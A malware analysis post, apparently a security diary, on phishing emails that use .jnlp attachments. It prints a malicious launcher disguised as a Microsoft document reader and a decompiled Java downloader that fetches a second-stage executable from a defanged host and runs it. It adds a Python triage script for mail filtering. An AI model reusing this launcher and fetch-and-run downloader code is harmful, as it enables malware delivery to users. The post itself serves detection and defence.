Another File Extension to Block in your MTA: .jnlp
When hunting, one thing I like to learn is how imaginative attackers can be at deploying new techniques. I spotted some emails with suspicious attachments based on the '.jnlp' extension. I'm pretty sure many people don't know what their purpose is, and if you don't know them, you don't look for them in your logs, SIEM, ... That makes them a good candidate to deliver malicious code!
Basically, a JNLP file[1] is... an XML file! It follows the "Java Network Launching Protocol" format and contains all the information required to execute a Java program: usually the address from which to download the (here, malicious) applet and the initial class to run.
I did a quick analysis of one of the captured JNLP files:
```xml
<?xml version="1.0" encoding="utf-8"?>
<jnlp spec="1.0+" codebase="hxxp://secured-doc-read[.]net" href="delivery.jnlp">
  <information>
    <title>Secure Document Reader</title>
    <vendor>Microsoft</vendor>
    <homepage href="wwww.microsoft.com"/>
    <description>Microsoft Secure Document Reader v.4.016</description>
  </information>
  <security>
    <all-permissions/>
  </security>
  <resources>
    <j2se version="1.6+" />
    <jar href="delivery.jar" />
  </resources>
  <application-desc main-class="Secure_Document_Reader">
  </application-desc>
  wghjs100570
</jnlp>
```
The syntax is easy to understand. The payload, 'delivery.jar' (line 14, the <jar> element), is downloaded from secured-doc-read[.]net (line 2, the codebase attribute), and the main class to run is "Secure_Document_Reader" (line 16). Note also the <all-permissions/> request in the <security> block: the application asks to run outside the Java sandbox.
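As an added example (not code from the diary), here is a small Python triage script that extracts those same indicators from a .jnlp attachment: the codebase, the jar URLs resolved against it, the main class and the <all-permissions/> request. The embedded sample is a trimmed, still-defanged copy of the launcher above; the quarantine policy in should_block() is an assumption, not something the diary prescribes.

```python
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

# Constructed sample: the launcher from the diary, kept defanged (hxxp, [.]) on purpose.
SAMPLE_JNLP = """<?xml version="1.0" encoding="utf-8"?>
<jnlp spec="1.0+" codebase="hxxp://secured-doc-read[.]net" href="delivery.jnlp">
  <information><title>Secure Document Reader</title><vendor>Microsoft</vendor></information>
  <security><all-permissions/></security>
  <resources><j2se version="1.6+" /><jar href="delivery.jar" /></resources>
  <application-desc main-class="Secure_Document_Reader"></application-desc>
  wghjs100570
</jnlp>"""

@dataclass
class JnlpReport:
    codebase: str
    jar_urls: list
    main_class: str
    all_permissions: bool
    findings: list = field(default_factory=list)

def triage_jnlp(xml_text: str) -> JnlpReport:
    """Parse a JNLP launcher and list the indicators a mail filter should act on."""
    # The stdlib parser keeps this self-contained; on a real gateway, feed
    # untrusted attachments through defusedxml instead.
    root = ET.fromstring(xml_text)
    if root.tag != "jnlp":
        raise ValueError("root element is not <jnlp>")
    codebase = root.get("codebase", "").rstrip("/")
    # Relative jar hrefs resolve against codebase, as Java Web Start does.
    jar_urls = []
    for jar in root.iter("jar"):
        href = jar.get("href", "")
        jar_urls.append(href if "://" in href else f"{codebase}/{href}")
    app = root.find("application-desc")
    main_class = app.get("main-class", "") if app is not None else ""
    all_perms = root.find("security/all-permissions") is not None
    rep = JnlpReport(codebase, jar_urls, main_class, all_perms)
    if all_perms:
        rep.findings.append("requests <all-permissions/>: runs outside the sandbox")
    for url in jar_urls:
        rep.findings.append(f"fetches and runs remote code: {url}")
    return rep

def should_block(rep: JnlpReport) -> bool:
    """Policy (assumed): quarantine any launcher that pulls a jar or asks for all permissions."""
    return bool(rep.jar_urls) or rep.all_permissions
```

The junk text after </application-desc> ("wghjs100570") is tolerated by the parser, so the sample is triaged exactly as Java would launch it.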
I decompiled the Jar file (SHA256:a4d95b7d196a4aca87cec384c5d21a756ab75cfaee7f4a20163d02109956a6dd)[2] and was surprised to find very simple code. Malicious Java applets often implement a RAT, but here we faced the simple code of a downloader (imports and comments added below; the decompiled logic is unchanged):
```java
import java.awt.Desktop;
import java.io.BufferedInputStream;
import java.io.File;
import java.io.FileOutputStream;
import java.net.URL;

public class Secure_Document_Reader {
    static BufferedInputStream frisco415;
    static FileOutputStream friekiegee;
    static String linkage9;

    public static void main(final String[] array) {
        // Stage 2: the ".jpg" is in fact a PE file
        frisco415("hxxp://sec-doc-v[.]com/images/dsc0386234.jpg");
    }

    public static void frisco415(final String spec) {
        final File file = new File(Secure_Document_Reader.linkage9);
        try {
            // Stream the remote payload to disk, 1 KB at a time
            Secure_Document_Reader.frisco415 = new BufferedInputStream(new URL(spec).openStream());
            Secure_Document_Reader.friekiegee = new FileOutputStream(Secure_Document_Reader.linkage9);
            final byte[] array = new byte[1024];
            int read;
            while ((read = Secure_Document_Reader.frisco415.read(array, 0, 1024)) != -1) {
                Secure_Document_Reader.friekiegee.write(array, 0, read);
            }
            Secure_Document_Reader.frisco415.close();
            Secure_Document_Reader.friekiegee.close();
        } catch (Exception ex) {}
        try {
            // Execute the dropped file via the desktop's default handler
            Desktop.getDesktop().open(file);
        } catch (Exception ex2) {}
    }

    static {
        Secure_Document_Reader.frisco415 = null;
        Secure_Document_Reader.friekiegee = null;
        // Drop location of the second stage
        Secure_Document_Reader.linkage9 = "C:\\ProgramData\\videodrv.exe";
    }
}
```
The next stage is downloaded from hxxp://sec-doc-v[.]com/images/dsc0386234.jpg and dropped on disk as 'videodrv.exe'. The PE file (SHA256:ceaf771da5e2678ed0d5844282bf0d464207c23842a8e36be3e7ab1df022ef89) has a VT score of 14/59[3].
Using .jnlp files is an effective way to bypass the first line of defense (mail filters), because a .jnlp file is a text file and contains no executable code itself. Note that Java must be installed on the victim's computer for .jnlp files to be handled.
[1] https://fileinfo.com/extension/jnlp
[2] https://www.virustotal.com/gui/file/a4d95b7d196a4aca87cec384c5d21a756ab75cfaee7f4a20163d02109956a6dd/detection
[3] https://www.virustotal.com/gui/file/ceaf771da5e2678ed0d5844282bf0d464207c23842a8e36be3e7ab1df022ef89/detection
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant